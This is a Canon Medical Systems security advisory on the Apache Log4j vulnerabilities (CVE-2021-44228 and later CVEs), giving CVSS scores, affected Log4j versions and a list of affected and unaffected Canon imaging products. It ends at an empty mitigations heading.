Apache Log4j Vulnerability

Canon Medical Systems Security Advisory

Overview:
It was announced that there are security vulnerabilities in Apache Log4j, a Java-based logging library provided by The Apache Software Foundation. On a server running Apache Log4j, a remote attacker could execute arbitrary code by sending specially crafted data that exploits these vulnerabilities.

Vulnerability Overview:
Log4j has a Lookup function that evaluates some values as variables from the character string described in the log. Among the Lookup functions, by exploiting the JNDI Lookup function, the problem (CWE-20, CVE-2021-44228) was discovered that Java class information is deserialized and executed from the external URL or internal path included in the log. This could allow a remote attacker to log a specially crafted string into the vulnerable system's log, resulting in arbitrary Java code being executed by the system. CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 were also reported after CVE-2021-44228. All vulnerabilities were fixed in the latest Log4j version (2.17.1).
The Apache Software Foundation has published the following information:

REF: https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
REF: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

-Base CVSS Score :
 CVE-2021-44228 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
 CVE-2021-45046 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
 CVE-2021-45105 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
 CVE-2021-44832 6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
-Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.17.1

Possible Affected Canon Medical Systems Products:
The following Canon Medical Systems Corporation products are not using Apache Log4j.

  • CT Medical Imaging Products
  • MR Medical Imaging Products
  • UL Medical Imaging Products
  • XR Medical Imaging Products
  • NM Medical Imaging Products
  • Eye-Care Products
  • Canon DR Products (CXDI_NE) such as Omnera, FlexPro, Soltus
  • VL Infinix-i and Alphenix DFP
  • VL Infinix-i Angio Workstation (AWS)
Canon Medical Products that are affected
  • Vitrea Advanced 7.x
  • VL Alphenix Angio Workstation (AWS)

Mitigations for affected systems: